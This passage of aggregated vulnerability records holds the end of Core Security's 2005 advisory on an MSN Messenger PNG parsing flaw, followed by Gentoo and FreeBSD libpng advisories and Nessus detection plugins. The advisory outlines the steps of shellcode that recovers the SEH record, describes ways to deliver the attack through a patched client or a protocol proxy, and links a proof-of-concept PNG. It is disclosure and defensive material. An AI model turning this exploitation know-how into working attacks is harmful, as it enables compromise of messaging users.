moves stack pointer to a lower address and saves registers.\r\n 2. performs the desired operations, i.e. creates a new thread.\r\n 3. reconstructs the overwritten SEH record.\r\n 4. recover saved register values, including the stack pointer.\r\n 5. returns a valid filter expression value (-1, 0 or 1) [5].\r\n\r\n Since delivery of an attack does not rely on any noticeable or\r\n suspicious network traffic outside of the normal behavior for the\r\n application's protocol, the only suitable way of detection from a\r\n network point of view is with the use of a proxy, IPS or firewall\r\n system with the capability of interpreting and normalizing the MSN\r\n Messenger protocol. In lieu of a patched client, attack detection\r\n should be based on the identification of malformed PNG images in\r\n MSN Messenger protocol traffic.\r\n\r\n The known attack vectors can be used to deliver successful attacks\r\n that are unnoticeable to the end user, not disrupting the execution\r\n of the MSN Messenger client running on the victim's computer and\r\n using it as a vantage point to compromise other clients by 'infecting'\r\n the victim's display picture.\r\n In this manner the vulnerability can be used to launch massive\r\n attacks using the application's underlying communications protocol as\r\n a delivery vector.\r\n Therefore, understanding the technical attributes for exploitation\r\n is also highly relevant to detect and prevent attacks.\r\n\r\n[Plausible exploit implementations]\r\n\r\n The code to exploit a server vulnerability usually involves\r\n implementing a limited portion of a network protocol that are in\r\n general, standard and well documented. Knowledge about encodings,\r\n languages and file formats are also needed to exploit browser or mail\r\n client flaws. However, even in those cases, the implementation\r\n complexity is low.\r\n\r\n In this case, crafting the malformed PNG image file seems simple but\r\n delivering the image to the victim through the Messenger protocol is\r\n somewhat a more difficult task.\r\n\r\n Alternatives to implementing an entire messenger client are:\r\n\r\n 1) using the standard client application to send the image.\r\n 2) using an open source third party client.\r\n 3) using a messenger protocol proxy.\r\n\r\n 1. In order to send the image using the standard client, it must be\r\n previously patched and modified to accept the infected image file as\r\n a display picture, emoticon or any other desired image type.\r\n\r\n 2. The difference with the previous option is that the modifications\r\n can be made easily.\r\n\r\n 3. The idea behind using a proxy is to avoid modifying a client, and\r\n being able to synchronize the other stages of an attack, as well as\r\n the possibility of using the same communication channel to control\r\n the victim's computer.\r\n A messenger protocol proxy can be used both to inject malformed PNG\r\n images to deliver an attack, or to sanitize outgoing traffic to\r\n prevent exploitation of third parties system.\r\n\r\n[Proof of Concept exploit code]\r\n\r\n To check if a MSN Messenger client is vulnerable, users can\r\n download the PNG image provided in the following URL\r\n\r\n http://www.coresecurity.com/corelabs/advisories/msn-vulncheck.zip\r\n\r\n The PNG image was built to work with MSN Messenger 6.2.0137.\r\n Once downloaded and uncompressed, open MSN Messenger, go to\r\n Tools->"Change display picture..." and select the file.\r\n\r\n On vulnerable clients either a message box will be shown or\r\n MSN Messenger will crash.\r\n\r\n\r\n*References*\r\n\r\n [1] libPNG 1.2.5 stack-based buffer overflow and other code concerns\r\n http://scary.beasts.org/security/CESA-2004-001.txt\r\n\r\n [2] Multiple buffer overflows in libpng 1.2.5\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n\r\n [3] Portable Network Graphics (PNG) Specification and Extensions\r\n http://www.libpng.org/pub/png/spec/\r\n\r\n [4] MSDN Compiler Security Checks In Depth\r\n http://go.microsoft.com/fwlink/?Linkid=7260\r\n\r\n [5] Structured Exception Handling\r\n http://msdn.microsoft.com/library/en-us/debug/base/structured_exception_handling.asp \r\n\r\n http://www.microsoft.com/msj/0197/exception/exception.aspx\r\n http://msdn.microsoft.com/library/en-us/debug/base/using_an_exception_handler.asp\r\n\r\n [6] MSN Messenger protocol - display pictures\r\n http://www.hypothetic.org/docs/msn/phorum/read.php?f=1&i=7834&t=7834\r\n\r\n\r\n*About Core Security Technologies*\r\n\r\n Core Security Technologies develops strategic security solutions for\r\n Fortune 1000 corporations, government agencies and military\r\n organizations. The company offers information security software and\r\n services designed to assess risk and protect and manage information\r\n assets. Headquartered in Boston, MA, Core Security Technologies can\r\n be reached at 617-399-6980 or on the Web at\r\n http://www.coresecurity.com.\r\n\r\n To learn more about CORE IMPACT, the first comprehensive penetration\r\n testing product, visit:\r\n http://www.coresecurity.com/products/coreimpact\r\n\r\n*DISCLAIMER:*\r\n\r\n The contents of this advisory are copyright (c) 2005 CORE Security\r\n Technologies and may be distributed freely provided that no fee is\r\n charged for this distribution and proper credit is given.\r\n\r\n$Id: msn-png-advisory.txt,v 1.19 2005/02/08 19:14:02 iarce Exp $\r\n", "edition": 1, "modified": "2005-02-09T00:00:00", "published": "2005-02-09T00:00:00", "id": "SECURITYVULNS:DOC:7775", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7775", "title": "[VulnWatch] CORE-2004-0819: MSN Messenger PNG Image Parsing Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "edition": 1, "description": "### Background\n\nlibpng is a standard library used to process PNG (Portable Network Graphics) images. It is used by several other programs, including web browsers and potentially server processes. \n\n### Description\n\nlibpng contains numerous vulnerabilities including null pointer dereference errors and boundary errors in various functions. \n\n### Impact\n\nAn attacker could exploit these vulnerabilities to cause programs linked against the library to crash or execute arbitrary code with the permissions of the user running the vulnerable program, which could be the root user. \n\n### Workaround\n\nThere is no known workaround at this time. All users are encouraged to upgrade to the latest available version. \n\n### Resolution\n\nAll libpng users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv \">=media-libs/libpng-1.2.5-r8\"\n # emerge \">=media-libs/libpng-1.2.5-r8\"\n\nYou should also run revdep-rebuild to rebuild any packages that depend on older versions of libpng : \n \n \n # revdep-rebuild", "modified": "2004-08-05T00:00:00", "published": "2004-08-05T00:00:00", "id": "GLSA-200408-03", "href": "https://security.gentoo.org/glsa/200408-03", "type": "gentoo", "title": "libpng: Numerous vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:16", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0758", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0763"], "description": "### Background\n\nMozilla is a popular web browser that includes a mail and newsreader. Galeon and Epiphany are both web browsers that use gecko, the Mozilla rendering engine. Mozilla Firefox is the next-generation browser from the Mozilla project that incorporates advanced features that are yet to be incorporated into Mozilla. Mozilla Thunderbird is the next-generation mail client from the Mozilla project. \n\n### Description\n\nMozilla, Galeon, Epiphany, Mozilla Firefox and Mozilla Thunderbird contain the following vulnerabilities: \n\n * All Mozilla tools use libpng for graphics. This library contains a buffer overflow which may lead to arbitrary code execution.\n * If a user imports a forged Certificate Authority (CA) certificate, it may overwrite and corrupt the valid CA already installed on the machine.\n\nMozilla, Mozilla Firefox, and other gecko-based browsers also contain a bug in their caching which may allow the SSL icon to remain visible, even when the site in question is an insecure site. \n\n### Impact\n\nUsers of Mozilla, Mozilla Firefox, and other gecko-based browsers are susceptible to SSL certificate spoofing, a Denial of Service against legitimate SSL sites, crashes, and arbitrary code execution. Users of Mozilla Thunderbird are susceptible to crashes and arbitrary code execution via malicious e-mails. \n\n### Workaround\n\nThere is no known workaround for most of these vulnerabilities. All users are advised to upgrade to the latest available version. \n\n### Resolution\n\nAll users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv your-version\n # emerge your-version", "edition": 1, "modified": "2007-12-30T00:00:00", "published": "2004-08-23T00:00:00", "id": "GLSA-200408-22", "href": "https://security.gentoo.org/glsa/200408-22", "type": "gentoo", "title": "Mozilla, Firefox, Thunderbird, Galeon, Epiphany: New releases fix vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\nChris Evans has discovered multiple vulnerabilities in libpng,\n\t which can be exploited by malicious people to compromise a\n\t vulnerable system or cause a DoS (Denial of Service).\n", "edition": 4, "modified": "2004-08-15T00:00:00", "published": "2004-08-04T00:00:00", "id": "F9E3E60B-E650-11D8-9B0A-000347A4FA7D", "href": "https://vuxml.freebsd.org/freebsd/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html", "title": "libpng stack-based buffer overflow and other code concerns", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:05:42", "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-08-05T00:00:00", "title": "Fedora Core 1 : libpng10-1.0.15-7 (2004-236)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libpng10-devel", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo", "p-cpe:/a:fedoraproject:fedora:libpng10"], "id": "FEDORA_2004-236.NASL", "href": "https://www.tenable.com/plugins/nessus/14207", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-236.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14207);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0597\");\n script_xref(name:\"FEDORA\", value:\"2004-236\");\n\n script_name(english:\"Fedora Core 1 : libpng10-1.0.15-7 (2004-236)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000244.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ac9f2f21\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libpng10, libpng10-debuginfo and / or\nlibpng10-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"libpng10-1.0.15-7\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"libpng10-debuginfo-1.0.15-7\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"libpng10-devel-1.0.15-7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng10 / libpng10-debuginfo / libpng10-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:21", "description": "Chris Evans discovered numerous vulnerabilities in the libpng graphics\nlibrary, including a remotely exploitable stack-based buffer overrun\nin the png_handle_tRNS function, dangerous code in png_handle_sBIT, a\npossible NULL pointer crash in png_handle_iCCP (which is also\nduplicated in multiple other locations), a theoretical integer\noverflow in png_read_png, and integer overflows during progressive\nreading.\n\nAll users are encouraged to upgrade immediately.", "edition": 24, "published": "2004-08-22T00:00:00", "title": "Mandrake Linux Security Advisory : libpng (MDKSA-2004:079)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-22T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libpng3", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "p-cpe:/a:mandriva:linux:lib64png3-static-devel", "p-cpe:/a:mandriva:linux:libpng3-devel", "p-cpe:/a:mandriva:linux:lib64png3", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:lib64png3-devel", "p-cpe:/a:mandriva:linux:libpng3-static-devel"], "id": "MANDRAKE_MDKSA-2004-079.NASL", "href": "https://www.tenable.com/plugins/nessus/14328", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:079. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14328);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"CERT\", value:\"160448\");\n script_xref(name:\"CERT\", value:\"236656\");\n script_xref(name:\"CERT\", value:\"286464\");\n script_xref(name:\"CERT\", value:\"388984\");\n script_xref(name:\"CERT\", value:\"477512\");\n script_xref(name:\"CERT\", value:\"817368\");\n script_xref(name:\"MDKSA\", value:\"2004:079\");\n\n script_name(english:\"Mandrake Linux Security Advisory : libpng (MDKSA-2004:079)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans discovered numerous vulnerabilities in the libpng graphics\nlibrary, including a remotely exploitable stack-based buffer overrun\nin the png_handle_tRNS function, dangerous code in png_handle_sBIT, a\npossible NULL pointer crash in png_handle_iCCP (which is also\nduplicated in multiple other locations), a theoretical integer\noverflow in png_read_png, and integer overflows during progressive\nreading.\n\nAll users are encouraged to upgrade immediately.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64png3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64png3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64png3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpng3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpng3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpng3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64png3-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64png3-devel-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64png3-static-devel-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libpng3-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libpng3-devel-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libpng3-static-devel-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libpng3-1.2.5-2.5.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libpng3-devel-1.2.5-2.5.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libpng3-static-devel-1.2.5-2.5.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64png3-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64png3-devel-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64png3-static-devel-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libpng3-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libpng3-devel-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libpng3-static-devel-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:05:42", "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-08-05T00:00:00", "title": "Fedora Core 1 : libpng-1.2.5-7 (2004-237)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libpng-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:libpng-devel", "p-cpe:/a:fedoraproject:fedora:libpng"], "id": "FEDORA_2004-237.NASL", "href": "https://www.tenable.com/plugins/nessus/14208", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-237.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14208);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0597\");\n script_xref(name:\"FEDORA\", value:\"2004-237\");\n\n script_name(english:\"Fedora Core 1 : libpng-1.2.5-7 (2004-237)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27a65410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libpng, libpng-debuginfo and / or libpng-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"libpng-1.2.5-7\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"libpng-debuginfo-1.2.5-7\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"libpng-devel-1.2.5-7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 